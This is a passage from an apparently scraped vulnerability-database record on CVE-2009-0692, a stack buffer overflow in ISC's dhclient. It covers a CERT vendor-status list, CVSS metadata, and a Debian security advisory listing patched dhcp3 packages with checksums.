Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Snort \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Soapstone Networks \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Sony Corporation \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Sourcefire \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Stonesoft \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Symantec \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ TippingPoint, Technologies, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Turbolinux \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ U4EA Technologies, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Unisys \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ VMware \n\nNotified: June 29, 2009 Updated: June 29, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Vyatta \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Watchguard Technologies, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ ZyXEL \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ eSoft, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ m0n0wall \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ netfilter \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n<https://www.isc.org/node/468>\n\n### Credit\n\nThis vulnerability was reported by ISC, who in turn credit the Mandriva Linux Engineering Team with discovering and reporting the vulnerability. \n\nThis document was written by Will Dormann. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2009-0692](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0692>) \n---|--- \n**Severity Metric:****** | 19.95 \n**Date Public:** | 2009-07-14 \n**Date First Published:** | 2009-07-14 \n**Date Last Updated: ** | 2009-07-29 16:45 UTC \n**Document Revision: ** | 27 \n", "modified": "2009-07-29T16:45:00", "published": "2009-07-14T00:00:00", "id": "VU:410676", "href": "https://www.kb.cert.org/vuls/id/410676", "type": "cert", "title": "ISC DHCP dhclient stack buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "description": "Buffer overflow on network mask processing.", "modified": "2009-07-15T00:00:00", "published": "2009-07-15T00:00:00", "id": "SECURITYVULNS:VULN:10073", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10073", "title": "ISC DHCP client buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1833-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nJuly 14, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : dhcp3\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2009-0692 CVE-2009-1892\r\nCERT advisory : VU#410676\r\n\r\nSeveral remote vulnerabilities have been discovered in ISC's DHCP\r\nimplementation:\r\n\r\nIt was discovered that dhclient does not properly handle overlong\r\nsubnet mask options, leading to a stack-based buffer overflow and\r\npossible arbitrary code execution. (CVE-2009-0692)\r\n\r\nChristoph Biedl discovered that the DHCP server may terminate when\r\nreceiving certain well-formed DHCP requests, provided that the server\r\nconfiguration mixes host definitions using "dhcp-client-identifier"\r\nand "hardware ethernet". This vulnerability only affects the lenny\r\nversions of dhcp3-server and dhcp3-server-ldap. (CVE-2009-1892)\r\n\r\nFor the old stable distribution (etch), these problems have been fixed\r\nin version 3.0.4-13+etch2.\r\n\r\nFor the stable distribution (lenny), this problem has been fixed in\r\nversion 3.1.1-6+lenny2.\r\n\r\nFor the unstable distribution (sid), these problems will be fixed\r\nsoon.\r\n\r\nWe recommend that you upgrade your dhcp3 packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4-13+etch2.diff.gz\r\n Size/MD5 checksum: 116721 6d49a9fb6b0617aba87cd90abef5bd57\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4.orig.tar.gz\r\n Size/MD5 checksum: 721450 aeb916fbb50edc320f142cd6a74cb48c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4-13+etch2.dsc\r\n Size/MD5 checksum: 1077 50aac538f9bb0e11e878758d754b1e14\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_alpha.deb\r\n Size/MD5 checksum: 157948 502301a6539a30b14cd2d6c8fb1bd032\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_alpha.deb\r\n Size/MD5 checksum: 113528 c89f3dfd91bbb2d8850359b78f5eae66\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_alpha.udeb\r\n Size/MD5 checksum: 192724 a4b5cab9e6f14ad9a80bef648435b86c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_alpha.deb\r\n Size/MD5 checksum: 240720 48996d54bf9d3fbae7d0a4f2b0e76224\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_alpha.deb\r\n Size/MD5 checksum: 304078 2e58f7af0c23b07b81b7e88031ec22b1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_alpha.deb\r\n Size/MD5 checksum: 346552 96169b1056055a13cbfb13fb8f73b061\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_amd64.udeb\r\n Size/MD5 checksum: 174734 3de2c8f75f8d6df63870c2d9638c8ae6\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_amd64.deb\r\n Size/MD5 checksum: 287422 052994dc5544eacac9b22837bba47660\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_amd64.deb\r\n Size/MD5 checksum: 222104 185470021c69635074e4d09a05275f49\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_amd64.deb\r\n Size/MD5 checksum: 131134 33fbb0278c39d36b2a0dd3819e192493\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_amd64.deb\r\n Size/MD5 checksum: 321874 e3ce73d54b47a930e440626672fcd521\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_amd64.deb\r\n Size/MD5 checksum: 103610 04e95fd257de2ca592e09cf8927b9c37\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_arm.deb\r\n Size/MD5 checksum: 99498 8098ab4856d359049538213ec0fa4a75\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_arm.udeb\r\n Size/MD5 checksum: 167040 21fcc83a87ed431f9d03b0479b522dd2\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_arm.deb\r\n Size/MD5 checksum: 280430 9355307446248854bffbe49a2120d450\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_arm.deb\r\n Size/MD5 checksum: 215172 0ab20469ee9fe1ccf05bfe40b68bc2d7\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_arm.deb\r\n Size/MD5 checksum: 123860 2b69130163d2cb83009710081a5be3ea\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_arm.deb\r\n Size/MD5 checksum: 314402 191cff362f2ceb557495d037aa2310c8\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_hppa.deb\r\n Size/MD5 checksum: 103994 3cbfc2d7eea1de9bf64f84d31889bf75\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_hppa.udeb\r\n Size/MD5 checksum: 171728 68bc286a4261035d72bbb1a63eb08dd9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_hppa.deb\r\n Size/MD5 checksum: 219790 b8e006bf59ac068513e4bb35c4c96d2d\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_hppa.deb\r\n Size/MD5 checksum: 139516 ee6ad7d1fd911b98cd40290823cdd50d\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_hppa.deb\r\n Size/MD5 checksum: 319134 d36a40e22c468e76386b2ab6befd8424\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_hppa.deb\r\n Size/MD5 checksum: 285302 09641cca4ba379d61c1dca0fbde543fb\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_i386.deb\r\n Size/MD5 checksum: 265170 5f0e7243ba3c59251a236b332fa0818f\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_i386.deb\r\n Size/MD5 checksum: 290962 ecb192ccc56b7982a8c60e54e4d55bbb\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_i386.deb\r\n Size/MD5 checksum: 198194 fe580c33e7953d727015063e3e24d209\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_i386.deb\r\n Size/MD5 checksum: 92416 686a574fea049cf930757230f86af87b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_i386.udeb\r\n Size/MD5 checksum: 150410 d3747839582b942b155f427a4034f6b7\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_i386.deb\r\n Size/MD5 checksum: 116952 340249d4e0ba06007f063b501dfeac0e\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_ia64.deb\r\n Size/MD5 checksum: 460536 81350e4d73103ffe454ae70a3f2ab967\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_ia64.deb\r\n Size/MD5 checksum: 381784 161f51028930ea9a1a078e9f6bc8070c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_ia64.deb\r\n Size/MD5 checksum: 325064 b51fa5cffbfd6e8daa2319ce287e6310\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_ia64.deb\r\n Size/MD5 checksum: 182712 0961dfa19e58b2fda1b397cccf0c56b2\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_ia64.udeb\r\n Size/MD5 checksum: 276972 7f96a3e76a36e8ecb74ae56a3066db91\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_ia64.deb\r\n Size/MD5 checksum: 150950 b62bfa283012eefe6123e4d57eafb95b\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_mips.udeb\r\n Size/MD5 checksum: 178822 f5413f7bc85b1c4f2b1c5fc1310b5101\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_mips.deb\r\n Size/MD5 checksum: 290490 a1df2dcfa3ccd3b787822d92979d1879\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_mips.deb\r\n Size/MD5 checksum: 227208 6795dad252df73ccad7093284117bc14\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_mips.deb\r\n Size/MD5 checksum: 137836 f3cb677fc63e5ad63d0ffb038bac2d8e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_mips.deb\r\n Size/MD5 checksum: 327612 a84dd37caf4e3a076d17fbb30e242656\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_mips.deb\r\n Size/MD5 checksum: 107814 a6c576fe51309fa51bc852e3cb061051\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_mipsel.deb\r\n Size/MD5 checksum: 289074 4c60b9d7ed1e6ebcc0a3e4233b4bad3b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_mipsel.deb\r\n Size/MD5 checksum: 225724 65671425f5a4d6468933dd782807ad0b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_mipsel.deb\r\n Size/MD5 checksum: 107314 2be8a4eb41d646e9aee26f1f2c02e63b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_mipsel.udeb\r\n Size/MD5 checksum: 177428 38810775a90a8dcaf51ecd4b62ff62d3\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_mipsel.deb\r\n Size/MD5 checksum: 137384 e5b6a97e69a9b63f22762bf74c79bdfe\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_mipsel.deb\r\n Size/MD5 checksum: 325660 db87a9bd8bcf73ffab1bf87171c4d18f\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_powerpc.deb\r\n Size/MD5 checksum: 95268 51a2d9e53a0d0d9bf3d948f8d2a045e4\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_powerpc.deb\r\n Size/MD5 checksum: 270644 29d8e657d95c12f489215de503c24ffb\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_powerpc.udeb\r\n Size/MD5 checksum: 155886 0ac02169c239b24ad9fddfa5e237186a\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_powerpc.deb\r\n Size/MD5 checksum: 130298 d93a5ddd00026cbaccd7a43c12d7eed5\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_powerpc.deb\r\n Size/MD5 checksum: 204226 b9c8f25ae0502d86a0db2a3ebeacee88\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_powerpc.deb\r\n Size/MD5 checksum: 299368 5022ae153ee18c6684c1b5a8b7c78a8f\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_sparc.deb\r\n Size/MD5 checksum: 202674 3219218e6e886505c7268e30344a199e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_sparc.deb\r\n Size/MD5 checksum: 125748 c3678c9c265ad4288a77147d99038b33\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_sparc.deb\r\n Size/MD5 checksum: 95246 db0c1035d5aefd6fc9a1682c3ea6fefb\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_sparc.deb\r\n Size/MD5 checksum: 296420 2a73341aa7331f0ab4038fc3587850bf\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_sparc.deb\r\n Size/MD5 checksum: 268822 6a6380bdd4dfc204e602f86c3f5e2ae9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_sparc.udeb\r\n Size/MD5 checksum: 154910 6dc0420162294571d894ed490d569fe9\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1.orig.tar.gz\r\n Size/MD5 checksum: 798228 fcc19330a9c3a0efb5620409214652a9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny2.diff.gz\r\n Size/MD5 checksum: 128880 72d4201330b347bfd5ccb15cad39c98f\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny2.dsc\r\n Size/MD5 checksum: 1488 595d2c450fe04edac8e5fcf916480a84\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp-client_3.1.1-6+lenny2_all.deb\r\n Size/MD5 checksum: 22976 0216788c7652496df9d297d3df2a81e7\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 394400 cb8559b314619922a91374579d6959c4\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 148276 a8a666404ecf773eaeaab5a2423b540e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 348508 cfc96c8147d27237b57e4e698f393cda\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 127480 989117e4e0bd1b90cbd5cd0ec06377d0\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 271974 b36ad4833551063757e31562c713d4ae\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_alpha.udeb\r\n Size/MD5 checksum: 215130 326aaed7e5144102deed214c5ab6a14c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 333764 b8ebbb4d8a8ac528a685490483da09f1\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 358390 68dccbc7e63ffb59c9ef2af3bfe4c7b3\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 245198 4cd491f7be9374393a4d9c8687b8276a\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 120404 4dfcb0d1f42836cac6d5679a1abdfcb9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 313190 5da5b48221028fff8d2fe89370ea051d\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 310328 f6a3ddc984847b078c9e93ad95d82ae4\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 114232 1980df61d75ea40ebc82c22c7005b3ea\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_amd64.udeb\r\n Size/MD5 checksum: 188412 91cf6d4362473d908f108a45c6e1073c\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 103692 0c3678563a2fadc12054811d3c5df5be\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 336338 22a205bb36afdb50717e1187c644ca7f\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 292856 d64219e9efe77445c5b3c2a5834a5f16\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 226548 30e51575f5aad4a17cda75b6277c2298\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 108874 71e3bc13d6e59a98f32f3466291becac\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_arm.udeb\r\n Size/MD5 checksum: 170056 460b6cb3d07249b2bf7a554504815cc3\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 291164 768c6b628b9285007277a884342fff2d\r\n\r\narmel architecture (ARM EABI)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 293770 aff3c87d606cf2b7cfc8cc2b6a433ee0\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 338686 20e3cf59a67c8d746918378e486adc72\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 109692 228381c7fbead4e0b3e140647c956015\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 103172 04a01c3e2e5eb34b9ca9b89ba6ff0704\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 227394 7afa7ddb6b23887f8a11ae1599c521b6\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 293020 00ed8969e284da3a687e4e6421dbdc3b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_armel.udeb\r\n Size/MD5 checksum: 170800 2e74568b6974af18c54a8f276157240f\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 116212 bbc799a4068272efbd27845c0b91de4d\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_hppa.udeb\r\n Size/MD5 checksum: 194972 d86d92f993fd03f2177847d0384cdc8e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 324480 169c91330d7627dd539342a950c0ede1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 315718 e86d7975c3341d02f319f7de97b13045\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 251748 956834560fde2009ae81efba433ab9b1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 127710 f67185d6696ef7104a888053488234f8\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 369580 cf511b62e1cbced8373103dd23604631\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 332434 deceed031e4ec70f9a89a3f9f1aa83a6\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_i386.udeb\r\n Size/MD5 checksum: 167142 890e95b663c536bd4794e4eeaf7e4620\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 106664 e9a85ff16968a9b0a982f2650d09b97e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 224288 ccaea8e386efccf4a9a7b5a66368a18b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 286932 acd0bd92af229ba24bb9e426e518144f\r\n 